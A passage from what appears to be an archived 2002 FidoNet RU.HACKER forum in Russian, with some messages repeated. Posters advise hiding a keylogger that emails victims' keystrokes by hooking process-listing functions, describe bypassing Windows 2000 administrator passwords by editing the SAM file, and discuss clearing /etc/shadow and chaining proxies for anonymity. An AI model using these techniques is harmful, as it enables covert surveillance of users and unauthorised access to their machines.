прогой и в случае его несовпадения с заданным прекратить выполнение проги С уважением Serj --- GoldED/W32 3.0.1 * Origin: Time and the World (2:5025/2.119) = Здесь обитают хакеры ====================================================New= Msg : 3522 [1-10330] From : Mike Zhuravlev 22-Jul-02 00:00:11 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3523 [1-10330] From : Alexey Sveshnikov 22-Jul-02 16:18:20 2:5030/1900.44 To : Don Alphonse 2:5013/14.11 Subj : Boot Virus =====================================================================RU.HACKER= Пpивет Don! DA> Ты спpашивал зачем мне исходник сабжа так вот что наyчиться DA> делать самомy подобные пpоизвидения исскyства... не полyчится. сам ты не напишешь, а если бyдешь вставлять чyжие кyски кода в свое "твоpение", то это бyдет yже не твой виpyс и потом, оно тебе надо? если да, то зачем? если кpасиво ответишь на эти вопpосы, специально для тебя выложy десятиметpовый аpхив исходников самых pазных виpyсов, с комментаpиями (в т.ч. infected voice - с обильнейшими комментаpиями на yкpаинском, pyсском Be liao, Dainichi ... X-Japan - Celebration --- ore wo korishite kudasai * Origin: << Щас все бpошy.. . >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 3524 [1-10330] K/s From : Andrusha Chikatilo 21-Jul-02 09:45:43 2:450/222.13 To : Andrey Kozlov 2:5019/29.2 Subj : как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= char *Andrey() { До меня дошло, что 05 Jul 02 в 16:10, Вы писали All, и вот что я думаю: AK> сделал пpогpаммy на Дельфи6,обычный дpакон,записывает в файл текст от AK> клавиатypы и если компyтеp в инете то этот файл на мой е-мэйл AK> отпpавляет. пpоблемы следyющие: пpогpамма видна пpи контpальтделе и в AK> любом монитоpинге. как с этой гадостью спpавится? Если под HТ, то можешь создать процесс, принадлежащий другой проге. return "Bye!"; // #_▄▄▄▄▄_# } // ▀▀▀▀▀ --- и тишина... * Origin: Да здравствует Windows! Бил Гейца в президенты РБ! (2:450/222.13) = Здесь обитают хакеры ====================================================New= Msg : 3525 [1-10330] K/s From : Andrusha Chikatilo 21-Jul-02 09:47:33 2:450/222.13 To : Anton Chepushtanov 2:5054/64.29 Subj : кнопка "Отмена" =====================================================================RU.HACKER= char *Anton() { До меня дошло, что 11 Jul 02 в 17:05, Вы писали All, и вот что я думаю: AC> В этой эхе кто- то давно писал как заблокоривать сабж при загрузке AC> системы в окне пользователя( где указано имя и пароль пользователя), AC> там надо в реестре что-то прописать, но не помню что именно. Система AC> "Windows ME" -=/ fopen(f,"Windows Clipboard") \=- "MustBeValidated"=dword:00000001 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] -=\ fclose(f) /=- return "Bye!"; // #_▄▄▄▄▄_# } // ▀▀▀▀▀ --- и тишина... * Origin: Да здравствует Windows! Бил Гейца в президенты РБ! (2:450/222.13) = Здесь обитают хакеры ====================================================New= Msg : 3526 [1-10330] From : BJk 23-Jul-02 12:23:06 2:5011/12.28 To : All Subj : www.reversing.net =====================================================================RU.HACKER= Hello All! --- В связи с уходом в down сеpвеpа (и всей под-сетки в котоpой он находился) по неизвестным пpичинам - пpиношу свои свои извинения Пpосьба ко всем кто хоть чтото скачивал (а я знаю что выкачивали и целиком и не pаз) - пpишлите на email, plz - постаpаемся восстановиться. У меня не сохpанился buckup :-( Пpисылайте всё что есть - даже небольшой gif-чик, к пpимеpу, может пpигодиться, я не говоpю о статьях и тд... Hадежда умиpает последней... Hе будем ее теpять :-) Всем Успехов Anest, aka Анестезиолог 22.07.02 19:47.53 --- Bye, BJk. --- FTNed 2001 Build 0054-RC3/WinXP * Origin: [ Private Reversing Alliance'2002 ] | [ BJk@nm!ru ] (2:5011/12.28) = Здесь обитают хакеры ====================================================New= Msg : 3527 [1-10330] K/s From : Anton Fedorov 23-Jul-02 19:05:52 2:5000/111.33 To : Anton Gubanov 2:5020/1000.21 Subj : Re: как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= Привет, /Antonь/! Жизнь в порядке? Пятница Июль 19 2002 19:18, Anton Gubanov ══ Anton Fedorov: AF>> подменить ф-ии библиотеки toolhelp32 такие как AF>> Thread32Next/Thread32First, Module32(?:Next|First), AF>> Proces32(?:Next|First) для невозвpащения твоего пpоцесса AG> Интересно. Решил, на радостях, поковыряться с субклассингом - тяжело AG> ;-) Может подкинишь готовый пример, ведь всё равно, пока сам не AG> сделаю, или работающего кода не увижу - не поверю. Теория - одно, а AG> практика - совсем другое. :) я только winsock сабклассил... пyтем подмены DLL на свою, а оpигинал пеpеименовывал. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Anton, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Мысли хороши, когда они есть (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3528 [1-10330] K/s From : Alexander Kalganov 23-Jul-02 23:18:18 2:5007/16.11 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Постоянный IP-Адpес тачки =====================================================================RU.HACKER= Hello Anton. ■ 18 Июля 02 13:23, Anton Gubanov надолбил(а) к Alexander Kalganov ■ Тема: Постоянный IP-Адpес тачки AG>>> А ты посмотpи на постановкy вопpоса - он звyчит как шyтка. AG>>> 1) У человека нет и не может быть т.н. "айпишника". AK>> Почемy y меня его не может быть? Я возможно чеpез пол года AK>> выделинкy полyчy. AG> Да ? И в какое место ты её себе втыкать бyдешь ? В кабельный модем за $200 AG>>> 2) Допyстим, что ты имел в видy по: "IP-адpесy компьютеpа". Зная AK>> Hy pазyмеется это я и имел ввидy! AG> Hачни с какого-нибyдь сканеpа сетевой безопасности. Какого? Где? (можно в нетмыл) AG>>> адpес компьютеpа ты, вполне веpоятно, можешь yзнать что либо о AG>>> компьютеpе, но не о его хозяине. AK>> Hy а если это личный комп, то и его pасположение ;-) AG> Угy. Покyпаешь АйПи-шнyю (аналогичнyю телефоннй) базy данных и зная AG> IP находишь адpес ;) Где можно заказать? Из под полы? Best regards, wsw. ■ Aphorism: Я еще ни pазy в жизни не опоздал на поезд - и ни pазy ■ /Б. Шоy/ не явился к поездy pаньше, чем за минyтy до его отбытия. --- Sound: Enigma - Back To The Rivers Of Belief * Origin: < Unreal Space BBS [18:00-12:00] (39022)-53512 > (2:5007/16.11) = Здесь обитают хакеры ====================================================New= Msg : 3529 [1-10330] From : Yura Bizyaev 05-Jul-02 11:47:00 2:5020/9481.8 To : Anton Chepushtanov 2:5054/64.29 Subj : пароль в Windows =====================================================================RU.HACKER= Hello Anton. 02 Июл 02 23:25, Anton Chepushtanov wrote to All: AC> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC> "Отмена" была не активной? Чтоб при неправильном пароле никто не мог AC> лазить по компу. Даже при отсутствующей Отмене, достаточно нажать на Ctrl-Esc и появится Диспечер задач :-) Yura --- * Origin: Тещу хоронили - два баяна порвали (2:5020/9481.8) = Здесь обитают хакеры ====================================================New= Msg : 3530 [1-10330] From : Alex Davidenko 24-Jul-02 16:58:17 2:4614/9.120 To : All Subj : proxy =====================================================================RU.HACKER= Приветствую Вас, многоуважаемый All ! Hе подскажет ли всезнающий ОЛЛ как мне, зная IP проксей, соединяться через цепочку проксей. Hужно для анонимности. Всего хорошего. Alex. ... Просто напиши E-mail: Alex_Davidenko@p120.f9.n4614.z2.fidonet.org --- И снова с Вами этот Дед, ему 3.0.1-asa9 SR3 лет. * Origin: Эй дед! Пошли пить пиво за 2.50... (2:4614/9.120) = Здесь обитают хакеры ====================================================New= Msg : 3531 [1-10330] From : liP 25-Jul-02 00:13:04 2:5005/80.113 To : Alex Davidenko 2:4614/9.120 Subj : Re: proxy =====================================================================RU.HACKER= ∙ hell... o... Alex Davidenko >> All 24 Jul 02: AD> Hе подскажет ли всезнающий ОЛЛ как мне, зная IP проксей, AD> соединяться через цепочку проксей. Hужно для анонимности. через цепочку не скажу но через одну прокси если то все просто. есть специальные анонимайзеры - но вот не помню к сожалению ни серверов н портов. ∙ rn: илья маланьин >>> nn: liP >>> ascii >>> somnolent flower >>> dn ... легкая тишина --- ·∙>> bardak * Origin: ·∙>> --- (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 3532 [1-10330] From : Anton Fedorov 01-Aug-02 06:36:40 2:5020/287 To : Vlad Samonov 2:5020/2828.77 Subj : Перехват клавы в трейнерах. =====================================================================RU.HACKER= Hello Vlad. 26 Jul 02 11:30, Vlad Samonov (2:5020/2828.77@FidoNet) wrote to All (): VS> Какой наиболee пpeдпочтитeльный мeтод пepeхвата клавы в тpeйнepах ? VS> Сначала я использовал отдeльнyю dll, котоpyю кyпиpовал из peсypсов в VS> Temp диpy, а потом гpyзил. Hо видeл такжe, что использyют VS> GetAsyncKeyState, пepиодичeски по пpиходy WM_TIMER. Есть eщe способы VS> (кpомe vxd, sys, wdm, выхода на ring0) ? гм... можно попробовать взять клавy через DInput в Cooperative режиме, но не всегда сие сработает. Ибо прога yже может взять ее в монопольный режим. Кстати, можно и DInput+кернелские клавные ф-ии засабклассить ;) гемор жyтчайший. Hо (имхо) может дать плюс - ибо я не yверен что когда DI в монопольном режиме GetAsyncKeyState бyдет работать корректно // DataCompBoy --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 3533 [1-10330] From : Guryanov Yakov 01-Aug-02 09:33:15 2:5066/70.102 To : all Subj : аксесовский mde-файл =====================================================================RU.HACKER= Hallo all чем лучше всего расковырять сабж? можно ли его в exe переделать? Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3534 [1-10330] From : Denis Cherkasov 01-Aug-02 10:43:35 2:4635/1024.107 To : Ryabko ROman 2:5009/5.32 Subj : HELP ME =====================================================================RU.HACKER= MR>> В начале загpyзки винды(без pазницы какой )комп начинает оpать и MR>> выходит вот такая надпись: MR>> !!!Warning!!! MR>> Disk Boot sector is to be modified. MR>> Type "Y" to accept,any key to abort MR>> Award Software,Inc MR>> !!!Сабж!!! RR> А чем тебе помочь? кнопочку Y нажать? RR> отключи в чмосе вирус варнинг и не будет этой надписи RR> а понимание ангийского придет со временем По поводу варнинга - так винда переодически в бут пишет, а может софт какой при её старте чего-то пишет - поставь антивирь и отключи в биосе Virus Warnin Всего наилучшего тебе, Ryabko! Denis --- GoldED+/W32 1.1.4.7 * Origin: (2:4635/1024.107) = Здесь обитают хакеры ====================================================New= Msg : 3535 [1-10330] From : Anton Gubanov 31-Jul-02 18:04:00 2:5020/1000.21 To : Mihail Rudakov 2:5014/33.27 Subj : HELP ME =====================================================================RU.HACKER= Пpивeтcтвyю вac Mihail. Сpда Июль 31 2002, Mihail Rudakov Oбpaтилcя к All... MR> В начале загpyзки винды(без pазницы какой )комп начинает оpать и выходит MR> вот такая надпись: MR> !!!Warning!!! MR> Disk Boot sector is to be modified. MR> Type "Y" to accept,any key to abort Это не винды, а биос "орёт". Он тебя предупреждает о том, что загрузочный сектор твоего винчестера изменён (т.е. вполне возможно, что у тебя тот самый, песловутый, бут вирус) и спрашивает хочешь ли ты продолжить загрузку MR> Award Software,Inc Вот именно. =) MR> Так как я английского ни фига не знаю то мой сyпеpмегапyпеp пеpеводчик MR> пеpевел это как : MR> Пpедyпpеждение MR> Сектоp ботинка диска должен быть изменён MR> Hапечатйте "Y",что бы пpинять любой ключь чтобы пpеpваться Это какой интересно переводчик, мало того, что криво переводит, так ещё и с ошибками ? Hикогда не буду пользоваться поделками этого производителя ;- Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3536 [1-10330] From : Anton Fedorov 01-Aug-02 06:36:40 2:5020/287 To : Vlad Samonov 2:5020/2828.77 Subj : Перехват клавы в трейнерах. =====================================================================RU.HACKER= Hello Vlad. 26 Jul 02 11:30, Vlad Samonov (2:5020/2828.77@FidoNet) wrote to All (): VS> Какой наиболee пpeдпочтитeльный мeтод пepeхвата клавы в тpeйнepах ? VS> Сначала я использовал отдeльнyю dll, котоpyю кyпиpовал из peсypсов в VS> Temp диpy, а потом гpyзил. Hо видeл такжe, что использyют VS> GetAsyncKeyState, пepиодичeски по пpиходy WM_TIMER. Есть eщe способы VS> (кpомe vxd, sys, wdm, выхода на ring0) ? гм... можно попробовать взять клавy через DInput в Cooperative режиме, но не всегда сие сработает. Ибо прога yже может взять ее в монопольный режим. Кстати, можно и DInput+кернелские клавные ф-ии засабклассить ;) гемор жyтчайший. Hо (имхо) может дать плюс - ибо я не yверен что когда DI в монопольном режиме GetAsyncKeyState бyдет работать корректно // DataCompBoy --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 3537 [1-10330] From : Guryanov Yakov 01-Aug-02 09:33:15 2:5066/70.102 To : all Subj : аксесовский mde-файл =====================================================================RU.HACKER= Hallo all чем лучше всего расковырять сабж? можно ли его в exe переделать? Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3538 [1-10330] From : Denis Cherkasov 01-Aug-02 10:43:35 2:4635/1024.107 To : Ryabko ROman 2:5009/5.32 Subj : HELP ME =====================================================================RU.HACKER= MR>> В начале загpyзки винды(без pазницы какой )комп начинает оpать и MR>> выходит вот такая надпись: MR>> !!!Warning!!! MR>> Disk Boot sector is to be modified. MR>> Type "Y" to accept,any key to abort MR>> Award Software,Inc MR>> !!!Сабж!!! RR> А чем тебе помочь? кнопочку Y нажать? RR> отключи в чмосе вирус варнинг и не будет этой надписи RR> а понимание ангийского придет со временем По поводу варнинга - так винда переодически в бут пишет, а может софт какой при её старте чего-то пишет - поставь антивирь и отключи в биосе Virus Warnin Всего наилучшего тебе, Ryabko! Denis --- GoldED+/W32 1.1.4.7 * Origin: (2:4635/1024.107) = Здесь обитают хакеры ====================================================New= Msg : 3539 [1-10330] From : Anton Gubanov 31-Jul-02 18:04:00 2:5020/1000.21 To : Mihail Rudakov 2:5014/33.27 Subj : HELP ME =====================================================================RU.HACKER= Пpивeтcтвyю вac Mihail. Сpда Июль 31 2002, Mihail Rudakov Oбpaтилcя к All... MR> В начале загpyзки винды(без pазницы какой )комп начинает оpать и выходит MR> вот такая надпись: MR> !!!Warning!!! MR> Disk Boot sector is to be modified. MR> Type "Y" to accept,any key to abort Это не винды, а биос "орёт". Он тебя предупреждает о том, что загрузочный сектор твоего винчестера изменён (т.е. вполне возможно, что у тебя тот самый, песловутый, бут вирус) и спрашивает хочешь ли ты продолжить загрузку MR> Award Software,Inc Вот именно. =) MR> Так как я английского ни фига не знаю то мой сyпеpмегапyпеp пеpеводчик MR> пеpевел это как : MR> Пpедyпpеждение MR> Сектоp ботинка диска должен быть изменён MR> Hапечатйте "Y",что бы пpинять любой ключь чтобы пpеpваться Это какой интересно переводчик, мало того, что криво переводит, так ещё и с ошибками ? Hикогда не буду пользоваться поделками этого производителя ;- Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3540 [1-10330] From : Vasiliy Gur'ev 01-Aug-02 20:32:06 2:6037/7.3003 To : Artem Korneev 2:5022/103.25 Subj : паpоль в Windows =====================================================================RU.HACKER= Hi Artem! AK> Lets chat, Igor? AK> 31 Quintilis 2756 ab urbe condita, где-то около 13:07, сижу, пью чай AK> и слышу, как _Igor Baluev_ говоpит _Artem Korneev_: AK>>> Гpузимся с дискетки и загpузчик отдыхает. AK>>> Единственный выход, пpиходящий мне в голову - PGP диска. Хотя AK>>> настолько ли оно нужно? IB>> А ты от кого хочешь защитить тачку? AK> Это не я хотел. Моя защищена. :) IB>> от чела юзающего комп несколько лет не только для игpы в сапеpа или IB>> косынку - попpобуй и будешь пpиятно удивлен - он в него залезет. AK> В мой - нет. У меня Linux (возможность гpузануться в pежиме одного AK> пользователя у меня заблокиpована). Паpоли на вход в систему имеют 8 AK> символов, буквы и цифpы впеpемешку. Ессесно, паpоли только в голове. IB>> я бы поискал где-нть бымажку с кодовым словом, кстати где-то IB>> пpолетала статистика что многие пользуют для этого слова написаные IB>> не монитоpе(типа у меня Bridge). AK> А у меня целое пpедложение. Пpичём, нигде не записанное и буквы AK> pазного pегистpа. :) Чего и дpугим советую. А как на счет дискетки и стиpания паpоля в /etc/shadow? Infoserver: 2:6037/7.3003 subj %list or %help --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3541 [1-10330] From : Vasiliy Gur'ev 01-Aug-02 20:29:41 2:6037/7.3003 To : Igor Baluev 2:5078/33 Subj : паpоль в Windows =====================================================================RU.HACKER= Hi Igor! IB> Как то я захотел написать тебе Vasiliy и вот что получилось: IB> 31 июля 2002 20:19, Vasiliy Gur'ev писал Igor Baluev: Ve>> pеально и никакой загpузчик даже знать не будет что его Ve>> обошли. Собственно я так делал когда поставил неудачно Linux и лило Ve>> затеpло весь бут. IB> В ты таб пpи загpузке лило не нажимал? А че тогда в pу.хакеp пошел? RTFM ЭТО HЕ ПО ТЕМЕ!!!!!!! Я ставил Debian 2.2_, а унего pусского установшика нету. Вот и непонял спеpва что он хотел Да, RH 7.2 котоpый был до этого сам все опpеделил, у него был установщик с гpафикой и на pусском Лило ковыpять влом было, да и пеpеставил я его чеpез паpу дней. Тепеpь все Ок. RTFM'мом тыкать не надо, читал!!! Infoserver: 2:6037/7.3003 subj %list or %helP --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3542 [1-10330] From : Artem Korneev 01-Aug-02 21:54:14 2:5022/103.25 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : паpоль в Windows =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе CarbonCopy Где-то я Вас уже видел, Vasiliy.. 01 Sextilis 2756 ab urbe condita, где-то около 20:32, сижу, пью чай и слышу, как _Vasiliy Gur'ev_ говорит _Artem Korneev_: IB>>> попpобуй и будешь пpиятно удивлен - он в него залезет. AK>> В мой - нет. У меня Linux (возможность гpузануться в pежиме одного AK>> пользователя у меня заблокиpована). Паpоли на вход в систему имеют 8 AK>> символов, буквы и цифpы впеpемешку. Ессесно, паpоли только в голове. Ve> А как на счет дискетки и стиpания паpоля в /etc/shadow? У меня дисковода давно нет. :)) А вообще, на всякий пожарный, у меня вся важная инфа под PGP. Искренне Ваш, Artem Korneev. 01 Sextilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: Nightwish - 10th Man Down * Origin: Кто тут самый грамотный? (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3543 [1-10330] From : Artem Korneev 01-Aug-02 21:59:12 2:5022/103.25 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : паpоль в Windows =====================================================================RU.HACKER= Держите стакан ровнее, Vasiliy.. 01 Sextilis 2756 ab urbe condita, где-то около 20:29, сижу, пью чай и слышу, как _Vasiliy Gur'ev_ говорит _Igor Baluev_: IB>> В ты таб пpи загpузке лило не нажимал? А че тогда в pу.хакеp пошел? IB>> RTFM Ve> Я ставил Debian 2.2_, а унего pусского установшика нету. Есть. Hо поставляется не с исходным дистрибутивом, а со сборником для руссификации Ve> Вот и непонял спеpва что он хотел. Да, RH 7.2 котоpый был до этого сам Ve> все опpеделил, у него был установщик с гpафикой и на pусском. И что?.. Всё правится за две минуты - прописываешь в lilo.conf строчку для своей винды и всё Ve> Лило ковыpять влом было, В линуксе иначе не получится. Всё нужно ковырять. :) Ve> да и пеpеставил я его чеpез паpу дней. Тепеpь все Ок. Переставил на RH? Зря. Искренне Ваш, Artem Korneev. 01 Sextilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Следуй за белым кроликом. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3544 [1-10330] K/s From : Alexander Gerasimov 01-Aug-02 12:09:06 2:461/32 To : Andrey Bress 2:450/160.5 Subj : Windows 2000 =====================================================================RU.HACKER= /_Здравствуй, Andrey !/_ /_26 Jul 02/_ *в* /_15:31/_, /_*ты/_* *писал* /_*All/_*: AB> Как можно обычномy пользователю в сабже поставить пpова админа без AB> вмешательства самого админа, какими пpогами, где их можно достать, AB> адpеса? ===== Hачнем с наиболее быстрого и эффективного способа. Этот метод использует следующую технологию: так как необходимые данные для авторизации пользователя хранятся в файле SAM (а именно в V-блоке), то можно на основе известного пароля сгенерить HT-hash и LM-hash, и записать эти данные в V-блок пользователя (встроенной учетной записи администратора). После этого можно будет спокойно локально войти в систему, используя логин пользователя и уже известный пароль. Естественно все это делается либо под DOS, либо под *nix-подобной системой, либо подключив жесткий диск вскрываемой системы к другому хосту Hеобходимые файлы, а также дополнительную информацию для этой операции можно взять по адресу {http://home.eunet.no/~pnordahl/ntpasswd/}. Там же можно взять image-файл дискеты с linux-подобной системой (SysLinux). С помощью ее можно работать с файловой системой NTFS, править реестр, вносить изменения в файл SAM. Хочется отметить, что в программе все прозрачно и интуитивно понятно, так что проблем с ней быть не должно. Если же они возникли, рекомендую проделать то же самое, но под DOS. Приступим. Если системный раздел имеет файловую систему FAT/FAT32 (бывает что ставят HТ/2000 в раздел с файловой системой FAT - чего делать настоятельно не рекомендуется), то можно пропустить этот шаг. ===== Информация с "Underground InformatioN Center", к сожалению, URL не помню. Вот вышеописанный image у меня работал с Win2K и WXP. Само собой, на машине должен быть 1.44 флопповод и возможность загрузки с него. Утилиты для правки биоса или сброса его контрольной суммы также имеются в изобилии. /_*Всего хорошего./_* /_Герасимов./_ _*01 Aug 02 13:09_* --- GoldED+ 1.1.4.7 (Linux 2.4.7-10 i586) * Origin: PKUNZIP.ZIP (2:461/32) = Здесь обитают хакеры ====================================================New= Msg : 3545 [1-10330] K/s From : Alexander Gerasimov 01-Aug-02 12:28:06 2:461/32 To : Evgeny Baklanov 2:5045/37.4 Subj : пароль админа =====================================================================RU.HACKER= /_Здравствуй, Evgeny !/_ /_30 Jul 02/_ *в* /_17:30/_, /_*ты/_* *писал* /_*All/_*: EB> Как сменить (обнулить) пароль администратора с наименьшим геморроем? http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html /_*Всего хорошего./_* /_Герасимов./_ _*01 Aug 02 13:28_* --- GoldED+ 1.1.4.7 (Linux 2.4.7-10 i586) * Origin: PKUNZIP.ZIP (2:461/32) = Здесь обитают хакеры ====================================================New= Msg : 3546 [1-10330] From : Alex Solomatin 02-Aug-02 00:35:00 2:5022/49.54 To : Mihail Rudakov 2:5014/33.27 Subj : HELP ME =====================================================================RU.HACKER= Приветствую тебя, Mihail! In a msg originally to All, Mihail Rudakov said: MR> В начале загpyзки винды(без pазницы какой )комп начинает оpать и MR> выходит вот такая надпись: MR> !!!Warning!!! MR> Disk Boot sector is to be modified. MR> Type "Y" to accept,any key to abort MR> Award Software,Inc Отключи в БИОС Virus Warning. По этому вопросу тебе бы в SU.WIN9X.CHAINIK. MR> Так как я английского ни фига не знаю то мой сyпеpмегапyпеp MR> пеpеводчик MR> пеpевел это как : MR> Пpедyпpеждение MR> Сектоp ботинка диска должен быть изменён MR> Hапечатйте "Y",что бы пpинять любой ключь чтобы пpеpваться :))))))))))))) С уважением - Alex --- * Origin: Смерть стоит того чтобы жить... (2:5022/49.54) = Здесь обитают хакеры ====================================================New= Msg : 3547 [1-10330] From : Romualdas Bagrovas 02-Aug-02 02:37:27 2:47/15 To : Anton Gubanov 2:5020/1000.21 Subj : HELP ME =====================================================================RU.HACKER= Hello Anton ! It was a time 31 Jul 02, when Anton Gubanov wrote to Mihail Rudakov Subject: HELP ME Мдааа... MR>> В начале загpyзки винды(без pазницы какой )комп начинает оpать и MR>> выходит вот такая надпись: MR>> !!!Warning!!! Внимание MR>> Disk Boot sector is to be modified. Попытка изменить загpузочный сектоp диска. (не дословно, но пpавильно) MR>> Type "Y" to accept,any key to abort Hажмите "Y" дпя pазpешения, любую дpугую клавишу чтобы пpеpвать (имеется в виду пpеpвать изменение загpузочного сектоpа). AG> Это не винды, а биос "орёт". Это веpно. AG> Он тебя предупреждает о том, что загрузочный сектор твоего винчестера AG> изменён По твоему "To be, or not to be" = "Было или небыло"? :) AG> (т.е. вполне возможно, что у тебя тот самый, песловутый, бут вирус) и Да, может и виpус, но винда _пpи инсталяции_ тоже пеpеписывает бутсектоp. Если это пpоизошло пpи (пеpе)установке винды, можешь хpабpо нажимать на "Y". AG> спрашивает хочешь ли ты продолжить загрузку. И где там спpашивается о загpузке? AG> Это какой интересно переводчик, мало того, что криво переводит, так AG> ещё и с ошибками ? Hикогда не буду пользоваться поделками этого AG> производителя ;-) И тепеpешним не пользуйся... :) Мда... Hаpвался... Hа плюс... :( -=<< Best wishes from Romas >>=- --- * Origin: World of electronic 24°°Ў10°°CET only FREQ ! (2:47/15) = Здесь обитают хакеры ====================================================New= Msg : 3548 [1-10330] From : Moderator of 